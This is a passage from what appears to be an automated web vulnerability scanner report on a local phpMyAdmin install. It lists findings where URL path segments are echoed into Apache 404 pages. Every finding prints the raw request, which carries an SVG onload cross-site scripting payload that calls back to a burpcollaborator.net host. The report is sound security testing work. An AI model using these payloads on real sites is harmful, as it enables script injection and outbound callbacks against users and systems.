X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 417
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//8enb4u121zuv6t76jj8haqhi99f43v8nwfm3jq9ey\56burpcollaborator.net'&gt;/js/error_report.js was not found on this server.</p>
...[SNIP]...
19.235. http://localhost/phpmyadmin/js/error_report.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/error_report.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//an1ddwa4a13xfvg8slhjjsqkibo6cxhp5hv5ssjg8%5c56burpcollaborator.net'%3e/error_report.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//an1ddwa4a13xfvg8slhjjsqkibo6cxhp5hv5ssjg8\56burpcollaborator.net'&gt;/error_report.js was not found on this server.</p>
...[SNIP]...
19.236. http://localhost/phpmyadmin/js/functions.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/functions.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//whhz7i4q4nxj9haum7b5dek6cxis6jbgz8pwgo3er3%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//whhz7i4q4nxj9haum7b5dek6cxis6jbgz8pwgo3er3\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.237. http://localhost/phpmyadmin/js/functions.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/functions.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//z552vlstsqlmxkyxaaz81h89006vumzjnbdzam0ap%5c56burpcollaborator.net'%3e/js/functions.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 414
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//z552vlstsqlmxkyxaaz81h89006vumzjnbdzam0ap\56burpcollaborator.net'&gt;/js/functions.js was not found on this server.</p>
...[SNIP]...
19.238. http://localhost/phpmyadmin/js/functions.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/functions.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//w52zvisqsnljxhyua7z51e860x6sujzgn8dwaj17q%5c56burpcollaborator.net'%3e/functions.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 422
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//w52zvisqsnljxhyua7z51e860x6sujzgn8dwaj17q\56burpcollaborator.net'&gt;/functions.js was not found on this server.</p>
...[SNIP]...
19.239. http://localhost/phpmyadmin/js/indexes.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/indexes.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//0kl3am7u7r0ncldypbe9ginaf1lw9nep2hs5jx6nuc%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0kl3am7u7r0ncldypbe9ginaf1lw9nep2hs5jx6nuc\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.240. http://localhost/phpmyadmin/js/indexes.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/indexes.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//1874ynvvvsoo0m1zdc2a4jbb329xxo2qqig6dt3hs%5c56burpcollaborator.net'%3e/js/indexes.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 412
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//1874ynvvvsoo0m1zdc2a4jbb329xxo2qqig6dt3hs\56burpcollaborator.net'&gt;/js/indexes.js was not found on this server.</p>
...[SNIP]...
19.241. http://localhost/phpmyadmin/js/indexes.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/indexes.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//7v3alti1iybunso50ipgrpyhq8w3kupwdo3c0zrng%5c56burpcollaborator.net'%3e/indexes.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 420
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//7v3alti1iybunso50ipgrpyhq8w3kupwdo3c0zrng\56burpcollaborator.net'&gt;/indexes.js was not found on this server.</p>
...[SNIP]...
19.242. http://localhost/phpmyadmin/js/keyhandler.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/keyhandler.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//fxgin1k9k6d2p0qd2qrotx0psgybm3cx0pqdh54vsk%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//fxgin1k9k6d2p0qd2qrotx0psgybm3cx0pqdh54vsk\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.243. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/keyhandler.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//817bruo2ozhvttu66jvhxq4iw924qwgq4iu6rthh6%5c56burpcollaborator.net'%3e/js/keyhandler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 415
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//817bruo2ozhvttu66jvhxq4iw924qwgq4iu6rthh6\56burpcollaborator.net'&gt;/js/keyhandler.js was not found on this server.</p>
...[SNIP]...
19.244. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/keyhandler.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//7goa6t313ywu8s95liagcpjhb8h35vvpjh956sxgm%5c56burpcollaborator.net'%3e/keyhandler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 423
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//7goa6t313ywu8s95liagcpjhb8h35vvpjh956sxgm\56burpcollaborator.net'&gt;/keyhandler.js was not found on this server.</p>
...[SNIP]...
19.245. http://localhost/phpmyadmin/js/menu-resizer.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/menu-resizer.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//n3rqt9qhqejav8wl8yxwz56xyo4jsbi961wpnha7yw%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//n3rqt9qhqejav8wl8yxwz56xyo4jsbi961wpnha7yw\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.246. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/menu-resizer.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//1eg44n1v1suo6m7zjc8aajhb92fx3ptnhf734quej%5c56burpcollaborator.net'%3e/js/menu-resizer.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 417
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//1eg44n1v1suo6m7zjc8aajhb92fx3ptnhf734quej\56burpcollaborator.net'&gt;/js/menu-resizer.js was not found on this server.</p>
...[SNIP]...
19.247. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/menu-resizer.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//swsvmejmjjcfodpq13q1saz2rtxolgbez6pumhd52%5c56burpcollaborator.net'%3e/menu-resizer.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//swsvmejmjjcfodpq13q1saz2rtxolgbez6pumhd52\56burpcollaborator.net'&gt;/menu-resizer.js was not found on this server.</p>
...[SNIP]...
19.248. http://localhost/phpmyadmin/js/messages.php [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//qe8t4c1k1hud6b7oj18za8h09rfm3etdh57tyllb90%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//qe8t4c1k1hud6b7oj18za8h09rfm3etdh57tyllb90\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.249. http://localhost/phpmyadmin/js/messages.php [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//gvfjl2iai7b3n1oe0rppryyqqhwck4a3yvojl6bu0%5c56burpcollaborator.net'%3e/js/messages.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 414
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//gvfjl2iai7b3n1oe0rppryyqqhwck4a3yvojl6bu0\56burpcollaborator.net'&gt;/js/messages.php was not found on this server.</p>
...[SNIP]...
19.250. http://localhost/phpmyadmin/js/messages.php [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//wssziifqfn8jkhlux7m5oev6nxtshk7jvblzim9ay%5c56burpcollaborator.net'%3e/messages.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 422
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//wssziifqfn8jkhlux7m5oev6nxtshk7jvblzim9ay\56burpcollaborator.net'&gt;/messages.php was not found on this server.</p>
...[SNIP]...
19.251. http://localhost/phpmyadmin/js/messages.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/messages.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /phpmyadmin/js/messages.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fqvptlcikihbdnboo01pzr8y0qrwmkeady5otig94y%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/messages.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//qvptlcikihbdnboo01pzr8y0qrwmkeady5otig94y\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.252. http://localhost/phpmyadmin/js/navigation.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/navigation.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ra5u0dxlxiqe2c3pf24069d15sbnzfpjdb3zurhh56%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ra5u0dxlxiqe2c3pf24069d15sbnzfpjdb3zurhh56\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.253. http://localhost/phpmyadmin/js/navigation.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/navigation.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//9eoc4v1310uw6u77jk8iarhj9af53xt1ht7h44usj%5c56burpcollaborator.net'%3e/js/navigation.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 415
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//9eoc4v1310uw6u77jk8iarhj9af53xt1ht7h44usj\56burpcollaborator.net'&gt;/js/navigation.js was not found on this server.</p>
...[SNIP]...
19.254. http://localhost/phpmyadmin/js/navigation.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/navigation.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//myopo8lglde9q7rk3xsvu41wtnzinade16ruohf54%5c56burpcollaborator.net'%3e/navigation.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 423
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//myopo8lglde9q7rk3xsvu41wtnzinade16ruohf54\56burpcollaborator.net'&gt;/navigation.js was not found on this server.</p>
...[SNIP]...
19.255. http://localhost/phpmyadmin/js/page_settings.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/page_settings.js

Issue detail

The value of the URL path filename is copied into the application's response.

